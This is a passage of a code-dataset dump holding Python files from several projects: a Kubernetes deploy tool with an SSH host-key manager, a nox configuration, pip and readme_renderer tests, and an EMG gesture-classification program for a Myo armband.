resource_string(__name__, 'resources/app-service.tmpl.yaml'))
APP_RC_TMPL = Template(
resource_string(__name__, 'resources/app-rc.tmpl.yaml'))
APP_SECRET_TMPL = Template(
resource_string(__name__, 'resources/app-secret.tmpl.yaml'))
def app_service(name):
return yaml.load(APP_SERVICE_TMPL.render(name=name))
def app_replicationcontroller(name, build_version, image, config):
return yaml.load(APP_RC_TMPL.render(
name=name,
build_version=build_version,
image=image,
config=config))
def app_secret(name, data):
return yaml.load(APP_SECRET_TMPL.render(name=name, data=data))
```
#### File: noel/noel/main.py
```python
import argparse
import os
import noel.builder.commands
import noel.deployer.commands
from noel.utils import run_command
def build_and_deploy_command(args):
"""Build an application image and deploy it to the cluster. This
essentially runs build and then deploy-image."""
image = noel.builder.commands.build_command(args)
args.image = image
noel.deployer.commands.deploy_image_command(args)
def main():
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers()
parser.add_argument(
'--kubernetes-url',
default='http://localhost:8001',
help="The URL for the Kubernetes API.")
noel.builder.commands.register_commands(subparsers)
noel.deployer.commands.register_commands(subparsers)
build_and_deploy = subparsers.add_parser(
'build-and-deploy',
help=build_and_deploy_command.__doc__)
build_and_deploy.set_defaults(func=build_and_deploy_command)
build_and_deploy.add_argument(
'--project-id',
default=None,
help='Google Cloud Project ID, if not specified, it will use gcloud\'s '
'currently configured project.')
build_and_deploy.add_argument(
'--dir',
default=os.getcwd(),
help='Directory containing application and Dockerfile. Defaults to the '
'current directory.')
build_and_deploy.add_argument(
'--app',
default=os.path.basename(os.getcwd()),
help='The application name. Defaults to the name of the directory.')
build_and_deploy.add_argument(
'--version',
default=None,
help='The image tag version. Defaults to the current date & time.')
run_command(parser)
```
#### File: src/ssh_host_keys_manager/main.py
```python
import argparse
import os
import sys
from subprocess import check_call
import time
from jinja2 import Template
from noel.kubernetes import Kubernetes, KubernetesError
from noel.logger import logger, setup_logging
import requests
from pkg_resources import resource_string
import yaml
def wait_for_kubernetes(k8s):
tries = 5
sys.stdout.write('Waiting for kubeproxy.')
while True:
try:
requests.get(k8s._api_root)
sys.stdout.write(' done.\n')
return
except requests.exceptions.ConnectionError:
if tries == 0:
sys.stdout.write(' failed.\n')
sys.exit(1)
tries -= 1
sys.stdout.write('.')
time.sleep(5)
def get_host_keys(k8s):
try:
return k8s.get_secret('ssh-host-keys')['data']
except KubernetesError:
return None
SSH_HOST_KEY_SECRET_TMPL = Template(
resource_string(__name__, 'resources/ssh-host-key-secret.tmpl.yaml'))
def ssh_host_key_secret_template(name='ssh-host-keys'):
return yaml.load(SSH_HOST_KEY_SECRET_TMPL.render(name=name))
def put_host_keys(k8s, keys):
spec = ssh_host_key_secret_template()
spec['data'] = keys
k8s.create_secret(spec)
def generate_ssh_host_keys(destination):
dsa_key_path = os.path.join(destination, 'ssh_host_dsa_key')
rsa_key_path = os.path.join(destination, 'ssh_host_rsa_key')
ecdsa_key_path = os.path.join(destination, 'ssh_host_ecdsa_key')
for path in [dsa_key_path, rsa_key_path, ecdsa_key_path]:
if os.path.exists(path):
os.unlink(path)
check_call(['ssh-keygen', '-q', '-t', 'dsa', '-N', '', '-f', dsa_key_path])
check_call(['ssh-keygen', '-q', '-t', 'rsa', '-N', '', '-f', rsa_key_path])
check_call(
['ssh-keygen', '-q', '-t', 'ecdsa', '-N', '', '-f', ecdsa_key_path])
for path in [dsa_key_path, rsa_key_path, ecdsa_key_path]:
os.chmod(path, 0o600)
return {
'dsa': open(dsa_key_path, 'r').read(),
'rsa': open(rsa_key_path, 'r').read(),
'ecdsa': open(ecdsa_key_path, 'r').read()
}
def write_ssh_host_keys(destination, keys):
dsa_key_path = os.path.join(destination, 'ssh_host_dsa_key')
rsa_key_path = os.path.join(destination, 'ssh_host_rsa_key')
ecdsa_key_path = os.path.join(destination, 'ssh_host_ecdsa_key')
for path in [dsa_key_path, rsa_key_path, ecdsa_key_path]:
if os.path.exists(path):
os.unlink(path)
with open(dsa_key_path, 'w') as f:
f.write(keys['dsa'])
with open(rsa_key_path, 'w') as f:
f.write(keys['rsa'])
with open(ecdsa_key_path, 'w') as f:
f.write(keys['ecdsa'])
for path in [dsa_key_path, rsa_key_path, ecdsa_key_path]:
os.chmod(path, 0o600)
def run(args):
k8s = Kubernetes(args.kubernetes_url, namespace='noel')
wait_for_kubernetes(k8s)
keys = get_host_keys(k8s)
if keys:
logger.info('Existing ssh host keys found.')
write_ssh_host_keys(args.destination, keys)
return
logger.warning('No existing ssh host keys. Generating keys.')
keys = generate_ssh_host_keys(args.destination)
try:
put_host_keys(k8s, keys)
logger.info('Host keys saved to Kubernetes.')
except KubernetesError as e:
if e.httperror.response.status_code == 409:
logger.error(
'Conflict while writing ssh keys to Kubernetes, retrying...')
return run(args)
else:
logger.exception('Unexpected error while writing ssh host keys.')
raise
def main():
setup_logging()
parser = argparse.ArgumentParser()
parser.add_argument(
'--kubernetes-url',
default='http://localhost:8001',
help='The URL for the Kubernetes API.')
parser.add_argument('--destination', default='/etc/ssh')
args = parser.parse_args()
run(args)
if __name__ == "__main__":
main()
``` |
{
"source": "jonparrott/nox",
"score": 2
} |
#### File: jonparrott/nox/noxfile.py
```python
from __future__ import annotations
import functools
import os
import platform
import shutil
import nox
ON_WINDOWS_CI = "CI" in os.environ and platform.system() == "Windows"
# Skip 'conda_tests' if user doesn't have conda installed
nox.options.sessions = ["tests", "cover", "lint", "docs"]
if shutil.which("conda"):
nox.options.sessions.append("conda_tests")
@nox.session(python=["3.7", "3.8", "3.9", "3.10"])
def tests(session: nox.Session) -> None:
"""Run test suite with pytest."""
session.create_tmp() # Fixes permission errors on Windows
session.install("-r", "requirements-test.txt")
session.install("-e", ".[tox_to_nox]")
session.run(
"pytest",
"--cov=nox",
"--cov-config",
"pyproject.toml",
"--cov-report=",
*session.posargs,
env={"COVERAGE_FILE": f".coverage.{session.python}"},
)
session.notify("cover")
@nox.session(python=["3.7", "3.8", "3.9", "3.10"], venv_backend="conda")
def conda_tests(session: nox.Session) -> None:
"""Run test suite with pytest."""
session.create_tmp() # Fixes permission errors on Windows
session.conda_install(
"--file", "requirements-conda-test.txt", "--channel", "conda-forge"
)
session.install("-e", ".", "--no-deps")
session.run("pytest", *session.posargs)
@nox.session
def cover(session: nox.Session) -> None:
"""Coverage analysis."""
if ON_WINDOWS_CI:
return
session.install("coverage[toml]")
session.run("coverage", "combine")
session.run("coverage", "report", "--fail-under=100", "--show-missing")
session.run("coverage", "erase")
@nox.session(python="3.9")
def lint(session: nox.Session) -> None:
"""Run pre-commit linting."""
session.install("pre-commit")
session.run(
"pre-commit",
"run",
"--all-files",
"--show-diff-on-failure",
"--hook-stage=manual",
*session.posargs,
)
@nox.session
def docs(session: nox.Session) -> None:
"""Build the documentation."""
output_dir = os.path.join(session.create_tmp(), "output")
doctrees, html = map(
functools.partial(os.path.join, output_dir), ["doctrees", "html"]
)
shutil.rmtree(output_dir, ignore_errors=True)
session.install("-r", "requirements-test.txt")
session.install(".")
session.cd("docs")
sphinx_args = ["-b", "html", "-W", "-d", doctrees, ".", html]
if not session.interactive:
sphinx_cmd = "sphinx-build"
else:
sphinx_cmd = "sphinx-autobuild"
sphinx_args.insert(0, "--open-browser")
session.run(sphinx_cmd, *sphinx_args)
# The following sessions are only to be run in CI to check the nox GHA action
def _check_python_version(session: nox.Session) -> None:
if session.python.startswith("pypy"):
python_version = session.python[4:]
implementation = "pypy"
else:
python_version = session.python
implementation = "cpython"
session.run(
"python",
"-c",
"import sys; assert '.'.join(str(v) for v in sys.version_info[:2]) =="
f" '{python_version}'",
)
if python_version[:2] != "2.":
session.run(
"python",
"-c",
f"import sys; assert sys.implementation.name == '{implementation}'",
)
@nox.session(python=["3.7", "3.8", "3.9", "3.10", "pypy3.7", "pypy3.8", "pypy3.9"])
def github_actions_default_tests(session: nox.Session) -> None:
"""Check default versions installed by the nox GHA Action"""
_check_python_version(session)
``` |
{
"source": "jonparrott/pip",
"score": 2
} |
#### File: tests/functional/test_install_vcs_git.py
```python
import pytest
from mock import patch
from pip.vcs.git import Git
from tests.lib import _create_test_package
from tests.lib.git_submodule_helpers import (
_change_test_package_submodule, _create_test_package_with_submodule,
_pull_in_submodule_changes_to_module
)
@pytest.mark.network
def test_get_short_refs_should_return_tag_name_and_commit_pair(script):
version_pkg_path = _create_test_package(script)
script.run('git', 'tag', '0.1', cwd=version_pkg_path)
script.run('git', 'tag', '0.2', cwd=version_pkg_path)
commit = script.run(
'git', 'rev-parse', 'HEAD',
cwd=version_pkg_path
).stdout.strip()
git = Git()
result = git.get_short_refs(version_pkg_path)
assert result['0.1'] == commit, result
assert result['0.2'] == commit, result
@pytest.mark.network
def test_get_short_refs_should_return_branch_name_and_commit_pair(script):
version_pkg_path = _create_test_package(script)
script.run('git', 'branch', 'branch0.1', cwd=version_pkg_path)
commit = script.run(
'git', 'rev-parse', 'HEAD',
cwd=version_pkg_path
).stdout.strip()
git = Git()
result = git.get_short_refs(version_pkg_path)
assert result['master'] == commit, result
assert result['branch0.1'] == commit, result
@pytest.mark.network
def test_get_short_refs_should_ignore_no_branch(script):
version_pkg_path = _create_test_package(script)
script.run('git', 'branch', 'branch0.1', cwd=version_pkg_path)
commit = script.run(
'git', 'rev-parse', 'HEAD',
cwd=version_pkg_path
).stdout.strip()
# current branch here is "* (nobranch)"
script.run(
'git', 'checkout', commit,
cwd=version_pkg_path,
expect_stderr=True,
)
git = Git()
result = git.get_short_refs(version_pkg_path)
assert result['master'] == commit, result
assert result['branch0.1'] == commit, result
@pytest.mark.network
def test_check_version(script):
version_pkg_path = _create_test_package(script)
script.run('git', 'branch', 'branch0.1', cwd=version_pkg_path)
commit = script.run(
'git', 'rev-parse', 'HEAD',
cwd=version_pkg_path
).stdout.strip()
git = Git()
assert git.check_version(version_pkg_path, [commit])
assert git.check_version(version_pkg_path, [commit[:7]])
assert not git.check_version(version_pkg_path, ['branch0.1'])
assert not git.check_version(version_pkg_path, ['abc123'])
@patch('pip.vcs.git.Git.get_short_refs')
def test_check_rev_options_should_handle_branch_name(get_refs_mock):
get_refs_mock.return_value = {'master': '123456', '0.1': '123456'}
git = Git()
result = git.check_rev_options('master', '.', [])
assert result == ['123456']
@patch('pip.vcs.git.Git.get_short_refs')
def test_check_rev_options_should_handle_tag_name(get_refs_mock):
get_refs_mock.return_value = {'master': '123456', '0.1': '123456'}
git = Git()
result = git.check_rev_options('0.1', '.', [])
assert result == ['123456']
@patch('pip.vcs.git.Git.get_short_refs')
def test_check_rev_options_should_handle_ambiguous_commit(get_refs_mock):
get_refs_mock.return_value = {'master': '123456', '0.1': '123456'}
git = Git()
result = git.check_rev_options('0.1', '.', [])
assert result == ['123456'], result
# TODO(pnasrat) fix all helpers to do right things with paths on windows.
@pytest.mark.skipif("sys.platform == 'win32'")
@pytest.mark.network
def test_check_submodule_addition(script):
"""
Submodules are pulled in on install and updated on upgrade.
"""
module_path, submodule_path = _create_test_package_with_submodule(script)
install_result = script.pip(
'install', '-e', 'git+' + module_path + '#egg=version_pkg'
)
assert (
script.venv / 'src/version-pkg/testpkg/static/testfile'
in install_result.files_created
)
_change_test_package_submodule(script, submodule_path)
_pull_in_submodule_changes_to_module(script, module_path)
# expect error because git may write to stderr
update_result = script.pip(
'install', '-e', 'git+' + module_path + '#egg=version_pkg',
'--upgrade',
expect_error=True,
)
assert (
script.venv / 'src/version-pkg/testpkg/static/testfile2'
in update_result.files_created
)
```
#### File: tests/unit/test_req_uninstall.py
```python
import os
import pip.req.req_uninstall
import pytest
from mock import Mock
from pip.req.req_uninstall import UninstallPathSet, uninstallation_paths
# Pretend all files are local, so UninstallPathSet accepts files in the tmpdir,
# outside the virtualenv
def mock_is_local(path):
return True
def test_uninstallation_paths():
class dist(object):
def get_metadata_lines(self, record):
return ['file.py,,',
'file.pyc,,',
'file.so,,',
'nopyc.py']
location = ''
d = dist()
paths = list(uninstallation_paths(d))
expected = ['file.py',
'file.pyc',
'file.so',
'nopyc.py',
'nopyc.pyc']
assert paths == expected
# Avoid an easy 'unique generator' bug
paths2 = list(uninstallation_paths(d))
assert paths2 == paths
class TestUninstallPathSet(object):
def test_add(self, tmpdir, monkeypatch):
monkeypatch.setattr(pip.req.req_uninstall, 'is_local', mock_is_local)
# Fix case for windows tests
file_extant = os.path.normcase(os.path.join(tmpdir, 'foo'))
file_nonexistent = os.path.normcase(
os.path.join(tmpdir, 'nonexistent'))
with open(file_extant, 'w'):
pass
ups = UninstallPathSet(dist=Mock())
assert ups.paths == set()
ups.add(file_extant)
assert ups.paths == set([file_extant])
ups.add(file_nonexistent)
assert ups.paths == set([file_extant])
@pytest.mark.skipif("sys.platform == 'win32'")
def test_add_symlink(self, tmpdir, monkeypatch):
monkeypatch.setattr(pip.req.req_uninstall, 'is_local', mock_is_local)
f = os.path.join(tmpdir, 'foo')
with open(f, 'w'):
pass
l = os.path.join(tmpdir, 'foo_link')
os.symlink(f, l)
ups = UninstallPathSet(dist=Mock())
ups.add(l)
assert ups.paths == set([l])
def test_compact_shorter_path(self, monkeypatch):
monkeypatch.setattr(pip.req.req_uninstall, 'is_local', lambda p: True)
monkeypatch.setattr('os.path.exists', lambda p: True)
# This deals with nt/posix path differences
short_path = os.path.normcase(os.path.abspath(
os.path.join(os.path.sep, 'path')))
ups = UninstallPathSet(dist=Mock())
ups.add(short_path)
ups.add(os.path.join(short_path, 'longer'))
assert ups.compact(ups.paths) == set([short_path])
@pytest.mark.skipif("sys.platform == 'win32'")
def test_detect_symlink_dirs(self, monkeypatch, tmpdir):
monkeypatch.setattr(pip.req.req_uninstall, 'is_local', lambda p: True)
# construct 2 paths:
# tmpdir/dir/file
# tmpdir/dirlink/file (where dirlink is a link to dir)
d = tmpdir.join('dir')
d.mkdir()
dlink = tmpdir.join('dirlink')
os.symlink(d, dlink)
d.join('file').touch()
path1 = str(d.join('file'))
path2 = str(dlink.join('file'))
ups = UninstallPathSet(dist=Mock())
ups.add(path1)
ups.add(path2)
assert ups.paths == set([path1])
``` |
{
"source": "jonparrott/readme_renderer",
"score": 2
} |
#### File: readme_renderer/integration/distutils.py
```python
from __future__ import absolute_import, division, print_function
import cgi
import io
import distutils.log
from distutils.command.check import check as _check
from ..rst import render
class Check(_check):
def check_restructuredtext(self):
"""
Checks if the long string fields are reST-compliant.
"""
data = self.distribution.get_long_description()
content_type = getattr(
self.distribution.metadata, 'long_description_content_type', None)
if content_type:
content_type, _ = cgi.parse_header(content_type)
if content_type != 'text/x-rst':
self.warn(
"Not checking long description content type '%s', this "
"command only checks 'text/x-rst'." % content_type)
return
# None or empty string should both trigger this branch.
if not data or data == 'UNKNOWN':
self.warn(
"The project's long_description is either missing or empty.")
return
stream = io.StringIO()
markup = render(data, stream=stream)
for line in stream.getvalue().splitlines():
if line.startswith("<string>"):
line = line[8:]
self.warn(line)
if markup is None:
self.warn(
"The project's long_description has invalid markup which will "
"not be rendered on PyPI.")
return
self.announce(
"The project's long description is valid RST.",
level=distutils.log.INFO)
```
#### File: readme_renderer/tests/test_integration_distutils.py
```python
import distutils.dist
import mock
import pytest
import setuptools.dist
import readme_renderer.integration.distutils
def test_valid_rst():
dist = distutils.dist.Distribution(attrs=dict(
long_description="Hello, I am some text."))
checker = readme_renderer.integration.distutils.Check(dist)
checker.warn = mock.Mock()
checker.check_restructuredtext()
checker.warn.assert_not_called()
def test_invalid_rst():
dist = distutils.dist.Distribution(attrs=dict(
long_description="Hello, I am some `totally borked< text."))
checker = readme_renderer.integration.distutils.Check(dist)
checker.warn = mock.Mock()
checker.announce = mock.Mock()
checker.check_restructuredtext()
# Should warn once for the syntax error, and finally to warn that the
# overall syntax is invalid
checker.warn.call_count = 2
message_one = checker.warn.call_args_list[0][0][0]
assert 'start-string without end-string' in message_one
message_two = checker.warn.call_args_list[1][0][0]
assert 'invalid markup' in message_two
# Should not have announced that it was valid.
checker.announce.assert_not_called()
@pytest.mark.filterwarnings('ignore:::distutils.dist')
def test_markdown():
dist = setuptools.dist.Distribution(attrs=dict(
long_description="Hello, I am some text.",
long_description_content_type="text/markdown"))
checker = readme_renderer.integration.distutils.Check(dist)
checker.warn = mock.Mock()
checker.check_restructuredtext()
checker.warn.assert_called()
assert 'content type' in checker.warn.call_args[0][0]
def test_invalid_missing():
dist = distutils.dist.Distribution(attrs=dict())
checker = readme_renderer.integration.distutils.Check(dist)
checker.warn = mock.Mock()
checker.check_restructuredtext()
checker.warn.assert_called_once_with(mock.ANY)
assert 'missing' in checker.warn.call_args[0][0]
def test_invalid_empty():
dist = distutils.dist.Distribution(attrs=dict(
long_description=""))
checker = readme_renderer.integration.distutils.Check(dist)
checker.warn = mock.Mock()
checker.check_restructuredtext()
checker.warn.assert_called_once_with(mock.ANY)
assert 'missing' in checker.warn.call_args[0][0]
``` |
{
"source": "jonpas/EMGProc",
"score": 2
} |
#### File: jonpas/EMGProc/emgproc.py
```python
import sys
import os
import argparse
import time
import serial
import csv
import math
import pickle
from collections import defaultdict
import numpy as np
from sklearn.decomposition import PCA, FastICA
from sklearn.svm import SVC
# Graph
WINDOW_WIDTH = 800
WINDOW_HEIGHT = 800
PLOT_SCROLL = 3 # higher is faster
CHANNELS = 8
FONT_SIZE = 25
# Data
FREQUENCY = 200 # Hz
CSV_HEADER_EMG = ["timestamp", "emg1", "emg2", "emg3", "emg4", "emg5", "emg6", "emg7", "emg8"]
CSV_HEADER_CA = ["timestamp", "ca1", "ca2", "ca3", "ca4", "ca5", "ca6", "ca7", "ca8"]
# Processing
RMS_WINDOW_SIZE = 50
SVM_WINDOW_SIZE = 5 # higher is smoother but more delay
SVM_IDLE_WEIGHT_FACTOR = 100.0 # higher makes "idle" move more important
VERBOSE = False
# Plotting (Pygame) window interface
class Plotter():
def __init__(self, live=False):
if "pygame" not in sys.modules:
print("Error! pygame not loaded! Plotter not available for library use.")
return None
self.screen = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))
pygame.display.set_caption("Electromyography Processor")
self.font = pygame.font.Font(None, FONT_SIZE)
self.live = live
self.last_values = None
self.last_rms_values = None
self.last_ca_values = None
self.plots = 0
def plot(self, values, rms_values=[], ca_values=[], ca="", gesture="", frequency=None, recording=False):
if self.last_values is None:
self.last_values = values
self.last_rms_values = rms_values
self.last_ca_values = ca_values
self.plots = len(values) + len(ca_values)
return
self.screen.scroll(-PLOT_SCROLL)
self.screen.fill(pygame.Color("black"), (WINDOW_WIDTH - PLOT_SCROLL, 0, WINDOW_WIDTH, WINDOW_HEIGHT))
self.screen.fill(pygame.Color("black"), (0, 0, 60, WINDOW_HEIGHT))
self.clear_info()
# Subplot base
for i in range(self.plots):
base_height = self.subplot_height(i)
pygame.draw.line(self.screen, pygame.Color("darkgrey"),
(WINDOW_WIDTH - PLOT_SCROLL, base_height),
(WINDOW_WIDTH, base_height))
if i < 8 and self.plots >= 8: # Raw / RMS
plot_text = self.font.render(f"RAW {i}", True, pygame.Color("darkgrey"))
rms_offset = 10 if rms_values else 0
if rms_values:
plot_rms = self.font.render(f"RMS {i}", True, pygame.Color("blue"))
self.screen.blit(plot_rms, (0, base_height - rms_offset - FONT_SIZE // 2))
self.screen.blit(plot_text, (0, base_height + rms_offset - FONT_SIZE // 2))
else: # PCA/ICA
plot_text = self.font.render(f" {ca.upper()} {i - len(values)}", True, pygame.Color("green"))
self.screen.blit(plot_text, (0, base_height - FONT_SIZE // 2))
# Raw signal
for i, (u, v) in enumerate(zip(self.last_values, values)):
pygame.draw.line(self.screen, pygame.Color("darkslategrey"),
(WINDOW_WIDTH - PLOT_SCROLL, self.subplot_height(i, u)),
(WINDOW_WIDTH, self.subplot_height(i, v)))
# Processed signals
if rms_values:
for i, (u, v) in enumerate(zip(self.last_rms_values, rms_values)):
pygame.draw.line(self.screen, pygame.Color("blue"),
(WINDOW_WIDTH - PLOT_SCROLL, self.subplot_height(i, u)),
(WINDOW_WIDTH, self.subplot_height(i, v)))
if ca_values:
for i, (u, v) in enumerate(zip(self.last_ca_values, ca_values)):
pygame.draw.line(self.screen, pygame.Color("green"),
(WINDOW_WIDTH - PLOT_SCROLL, self.subplot_height(i + len(rms_values), u)),
(WINDOW_WIDTH, self.subplot_height(i + len(rms_values), v)))
# Information
if frequency:
self.render_frequency(frequency)
self.render_mode()
self.render_controls(recording)
if gesture:
self.render_classification(gesture)
pygame.display.flip()
self.last_values = values
self.last_rms_values = rms_values
self.last_ca_values = ca_values
def subplot_height(self, i, value=0):
scaled_value = value * 1.5
return int(WINDOW_HEIGHT / (self.plots + 1) * (i + 1 - scaled_value))
def clear_info(self):
self.screen.fill(pygame.Color("black"), (0, 0, WINDOW_WIDTH, FONT_SIZE))
self.screen.fill(pygame.Color("black"), (0, WINDOW_HEIGHT - FONT_SIZE, WINDOW_WIDTH, WINDOW_HEIGHT))
def render_mode(self):
mode_text = "LIVE" if self.live else "PLAYBACK"
mode = self.font.render("LIVE" if self.live else "PLAYBACK",
True, pygame.Color("green"))
self.screen.blit(mode, (WINDOW_WIDTH // 2 - len(mode_text) * FONT_SIZE // 2, 0))
def render_frequency(self, frequency):
framerate = self.font.render(f"{frequency} Hz", True,
pygame.Color("green") if frequency > 180 else pygame.Color("red"))
self.screen.fill(pygame.Color("black"), (0, 0, 75, FONT_SIZE)) # Clear old framerate
self.screen.blit(framerate, (0, 0))
def render_controls(self, recording):
pause = self.font.render("P (pause)", True, pygame.Color("white"))
self.screen.blit(pause, (WINDOW_WIDTH - 250, 0))
if self.live: # Can only record live
record = self.font.render("R (stop rec)" if recording else "R (record)", True,
pygame.Color("red") if recording else pygame.Color("white"))
self.screen.blit(record, (WINDOW_WIDTH - 150, 0))
def render_classification(self, gesture):
plot_gesture = self.font.render(f"Classification: {gesture}", True, pygame.Color("green"))
self.screen.blit(plot_gesture, (WINDOW_WIDTH // 2 - 225, WINDOW_HEIGHT - FONT_SIZE))
def pause(self):
self.clear_info()
pause = self.font.render("P (resume)", True, pygame.Color("red"))
self.screen.blit(pause, (WINDOW_WIDTH - 250, 0))
self.render_mode()
pygame.display.flip()
def end(self):
self.clear_info()
pause = self.font.render("END", True, pygame.Color("red"))
self.screen.blit(pause, (WINDOW_WIDTH - 250, 0))
self.render_mode()
pygame.display.flip()
# Interface for data streaming from either live Myo device or recorded playback
class Stream():
def __init__(self, do_rms=False, pca_train_set=[], ica_train_set=[], ca_components=3, svm_train_set=[]):
self.plotter = None # Late setup (display modes)
self.reset()
# Processing
self.do_rms = do_rms
self.ca_components = ca_components
self.pca = self.init_pca(pca_train_set) if pca_train_set else None
self.ica = self.init_ica(ica_train_set) if ica_train_set else None
self.svm = self.init_svm(svm_train_set) if svm_train_set else None
self.gesture = ""
def create_plot(self, live=False):
self.plotter = Plotter(live=live)
def plot(self, data, ca=False, recording=False):
self.calc_frequency()
# Processing
rms_data, ca_data = [], []
if ca:
ca_data, data = data, []
else:
if self.do_rms or self.pca is not None or self.ica is not None:
rms_data = self.calc_rms(data)
ca_data = []
if self.pca is not None:
ca_data = self.calc_pca(rms_data)
elif self.ica is not None:
ca_data = self.calc_ica(rms_data)
if self.svm is not None:
self.gesture = self.class_svm(ca_data)
if not self.paused and self.plotter is not None:
self.plotter.plot([x / 500. for x in data],
rms_values=[x / 500. for x in rms_data],
ca_values=[x / 500. for x in ca_data],
ca=self.current_model()[1],
gesture=self.gesture,
frequency=self.frequency,
recording=recording)
return rms_data, ca_data, self.gesture
def calc_frequency(self):
self.times.append(time.time())
if len(self.times) >= 100:
self.frequency = int((len(self.times) - 1) / (self.times[-1] - self.times[0]))
self.times.clear()
def pause(self, state=False, toggle=False):
if toggle:
self.paused = not self.paused
else:
self.paused = state
if self.paused and not self.ended:
self.plotter.pause()
def end(self):
self.ended = True
if self.plotter is not None:
self.plotter.end()
def reset(self):
self.paused = False
self.ended = False
# Frequency measuring
self.times = []
self.frequency = 0
# Processing
self.rms_window = []
self.svm_window = []
# Processing
def calc_rms(self, data):
# Gather samples, up to RMS_WINDOW_SIZE
self.rms_window.append(data)
if len(self.rms_window) >= RMS_WINDOW_SIZE:
self.rms_window.pop(0)
# Calculate RMS for each channel
rms_data = [0] * CHANNELS
for channel in range(CHANNELS):
samples = [item[channel] for item in self.rms_window]
total = sum([sample ** 2 for sample in samples])
rms_data[channel] = math.sqrt(1.0 / RMS_WINDOW_SIZE * total)
if VERBOSE:
print(f"rms: {rms_data}")
return rms_data
def read_ca_train_set(self, train_set, stype="?"):
emg_data = []
for file in train_set:
print(f"Training {stype.upper()} with '{file}'...")
emg_file = open(file, "r", newline="")
emg_reader = csv.reader(emg_file, csv.unix_dialect, quoting=csv.QUOTE_MINIMAL)
# Read file
header = next(emg_reader)
if header == CSV_HEADER_EMG:
try:
while True:
data = next(emg_reader)
_, emg = data[0], list(map(int, data[1:]))
emg_data.append(self.calc_rms(emg))
except StopIteration:
pass
else:
print("-> Error! Incorrect header! Expected 'RAW'.")
self.rms_window.clear()
emg_file.close()
emg_data = np.array(emg_data)
return emg_data
def read_model(self, model, stype="?"):
print(f"Reading {stype.upper()} model '{model}'...")
with open(model, "rb") as f:
return pickle.load(f)
def init_pca(self, train_set):
if isinstance(train_set, list):
emg_data = self.read_ca_train_set(train_set, "pca")
# Initialize and train
pca = PCA(n_components=self.ca_components)
pca.fit(emg_data)
else:
pca = self.read_model(train_set, "pca")
return pca
def calc_pca(self, rms_data):
emg_data = np.array(rms_data).reshape(1, -1) # Reshape to 1 sample, N features
pca_data = self.pca.transform(emg_data)[0] # Take 1 sample from array of samples (contains only one)
if VERBOSE:
print(f"pca: {pca_data}")
return pca_data
def init_ica(self, train_set):
if isinstance(train_set, list):
emg_data = self.read_ca_train_set(train_set, "ica")
# Initialize and train
ica = FastICA(n_components=self.ca_components, random_state=0)
ica.fit(emg_data)
else:
ica = self.read_model(train_set, "ica")
return ica
def calc_ica(self, rms_data):
emg_data = np.array(rms_data).reshape(1, -1) # Reshape to 1 sample, N features
ica_data = self.ica.transform(emg_data)[0] # Take 1 sample from array of samples (contains only one)
ica_data *= 5000 # Scale up
if VERBOSE:
print(f"ica: {ica_data}")
return ica_data
def read_class_train_set(self, train_set, stype="?"):
emg_data = []
classes = []
for file in train_set:
classification = os.path.basename(file).split("_")[0]
print(f"Training {stype.upper()} '{classification}' with '{file}'...")
emg_file = open(file, "r", newline="")
emg_reader = csv.reader(emg_file, csv.unix_dialect, quoting=csv.QUOTE_MINIMAL)
# Read file
header = next(emg_reader)
if header == CSV_HEADER_CA[:self.ca_components + 1]:
try:
while True:
data = next(emg_reader)
_, emg = data[0], list(map(float, data[1:]))
emg_data.append(emg)
classes.append(classification)
except StopIteration:
pass
else:
print("-> Error! Incorrect header! Expected 'PCA/ICA'.")
emg_file.close()
if "idle" not in classes:
print("Warning! No 'idle' move trained!")
emg_data, classes = np.array(emg_data), np.array(classes)
return emg_data, classes
def init_svm(self, train_set):
if isinstance(train_set, list):
emg_data, classes = self.read_class_train_set(train_set, "svm")
svm = SVC(random_state=0, kernel="rbf", class_weight={"idle": SVM_IDLE_WEIGHT_FACTOR})
svm.fit(emg_data, classes)
else:
svm = self.read_model(train_set, "svm")
return svm
def class_svm(self, ca_data):
# Gather samples, up to SVM_WINDOW_SIZE to smooth classification
self.svm_window.append(ca_data)
if len(self.svm_window) > SVM_WINDOW_SIZE:
self.svm_window.pop(0)
window = np.array(self.svm_window)
svm_classes = self.svm.predict(window) # predict each sample in window
# Take classification with most occurences in the window
d = defaultdict(int)
for svm_class in svm_classes:
d[svm_class] += 1
svm_class = max(d.items(), key=lambda x: x[1])[0]
if VERBOSE:
print(f"svm: {svm_class}")
return svm_class
return ""
def current_model(self):
if self.svm is not None:
return self.svm, "svm"
elif self.pca is not None:
return self.pca, "pca"
elif self.ica is not None:
return self.ica, "ica"
return None, ""
# Live Myo device interface
class Myo():
def __init__(self, stream, tty, native, mac):
# Instantiate
self.myo = MyoRaw(tty, native, mac)
self.stream = stream
self.recording = False
self.recording_type = self.init_recording()
# Recording
self.emg_file = None
self.emg_writer = None
# Setup
self.setup()
def close(self):
self.myo.disconnect()
self.record(False)
def setup(self):
# Add handles to process EMG and battery level data
self.myo.add_handler(DataCategory.EMG, self.handle_emg)
self.myo.add_handler(DataCategory.BATTERY, self.handle_battery)
# Subscribe to all data services in full RAW mode (200 Hz)
self.myo.subscribe(EMGMode.RAW)
# Disable sleep to a void disconnects while retrieving data
self.myo.set_sleep_mode(1)
# Vibrate to signalise a successful setup
# myo.vibrate(1)
def run(self):
self.myo.run(1)
def disconnect(self):
self.myo.disconnect()
def sleep(self):
self.myo.deep_sleep()
def handle_emg(self, timestamp, emg, moving, characteristic_num):
emg = list(emg)
_, ca_data, _ = self.stream.plot(emg, recording=self.recording)
record_data = ca_data if len(ca_data) > 0 else emg
if self.recording:
csv_data = [timestamp]
csv_data.extend(record_data)
try:
self.emg_writer.writerow(csv_data)
except AttributeError:
print("Error! Unable to write to CSV!")
if VERBOSE:
print(f"[myo] {self.recording_type}: {timestamp}, {record_data}")
def handle_battery(self, timestamp, battery_level):
if battery_level < 5:
self.myo.set_leds([255, 0, 0], [255, 0, 0]) # red logo, red bar
else:
self.myo.set_leds([128, 128, 255], [128, 128, 255]) # purple logo, purple bar
if VERBOSE:
print(f"[myo] battery level: {timestamp}, {battery_level}")
def init_recording(self):
if self.stream.pca is not None:
return "pca"
elif self.stream.ica is not None:
return "ica"
return "raw"
def record(self, state=False, toggle=False):
if toggle:
recording = not self.recording
else:
recording = state
if recording:
filename = f"recordings/{self.recording_type}/{time.strftime('%Y%m%d-%H%M%S')}.csv"
os.makedirs(os.path.dirname(filename), exist_ok=True)
self.emg_file = open(filename, "w", newline="")
self.emg_writer = csv.writer(self.emg_file, csv.unix_dialect, quoting=csv.QUOTE_MINIMAL)
